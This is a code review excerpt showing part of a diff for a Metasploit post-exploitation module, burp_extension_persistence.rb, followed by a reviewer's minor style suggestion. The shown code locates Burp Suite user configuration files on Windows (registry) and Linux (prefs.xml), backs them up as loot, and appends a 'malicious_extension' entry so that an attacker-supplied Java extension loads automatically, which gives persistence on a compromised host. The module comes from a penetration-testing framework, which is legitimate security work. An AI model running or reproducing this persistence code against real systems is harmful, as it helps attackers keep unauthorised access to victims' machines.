modules/exploits/multi/local/burp_extension_persistence.rb

```diff
@@ -0,0 +1,411 @@
+      end
+    end
+
+    configs = get_configs_from_settings
+    configs.each do |config|
+      if file?(config)
+        print_status("Found config: #{config}")
+      else
+        print_status("Config mentioned in settings, but not found: #{config}")
+      end
+    end
+
+    print_bad('User has no saved configs in their settings') if configs.empty?
+
+    if datastore['config'].blank?
+      return CheckCode::Detected('No config file listed, only writing plugin to disk')
+    elsif file?(datastore['config'])
+      return CheckCode::Detected("Config file found: #{datastore['config']}")
+    end
+
+    CheckCode::Safe("Config file not found: #{datastore['config']}")
+  end
+
+  def add_extension(settings_file, extension_location, extension_name)
+    # open file
+    config_contents = read_file(settings_file)
+    # store as loot for backup purposes
+    path = store_loot('burp.config.json', 'application/json', session, config_contents, nil, nil)
+    print_good("Config file saved in: #{path}")
+    # read json
+    begin
+      config_contents = JSON.parse(config_contents)
+    rescue JSON::ParserError
+      fail_with(Failure::Unknown, "Failed to parse json config file: #{settings_file}")
+    end
+    malicious_extension = {
+      'errors' => 'ui',
+      'extension_file' => extension_location,
+      'extension_type' => 'java',
+      'loaded' => true,
+      'name' => extension_name,
+      'output' => 'ui'
+    }
+    begin
+      config_contents['user_options']['extender']['extensions'] << malicious_extension
+    rescue NoMethodError
+      fail_with(Failure::Unknown, "Failed to find 'user_options' in config file: #{settings_file}, likely a project settings file not user.")
+    end
+    # write json
+    write_file(settings_file, JSON.pretty_generate(config_contents, { 'space' => '', 'indent' => ' ' * 4 }))
+  end
+
+  def target_user
+    return datastore['USER'] unless datastore['USER'].blank?
+
+    return cmd_exec('cmd.exe /c echo %USERNAME%').strip if ['windows', 'win'].include? session.platform
+
+    whoami
+  end
+
+  # windows stores these settings in the registry
+  # nix stores it in a prefs.xml file
+  def get_configs_from_settings
+    me = target_user
+    config_files = []
+    if ['windows', 'win'].include? session.platform
+      key = 'HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\burp'
+      i = 0
+      while i < 100 # place a hard upper limit just in case
+        value = registry_getvaldata(key, "free.suite.recent/Config/Files#{i}")
+        i += 1
+
+        break if value.nil?
+
+        value = value.sub(%r{^/}, '') # remove leading slash. Example entry: /C:///Users//windows///Desktop//burp_user_settings.json
+        config_files << value
+      end
+    else
+      files = [
+        "/home/#{me}/.java/.userPrefs/burp/prefs.xml",
+        "/home/#{me}/.java/.userPrefs/burp/community/prefs.xml"
+      ]
+      files.each do |f|
```

Comment:
```suggestion
      files = [
        "/home/#{me}/.java/.userPrefs/burp/prefs.xml",
        "/home/#{me}/.java/.userPrefs/burp/community/prefs.xml"
      ].each do |f|
```

No need for a variable here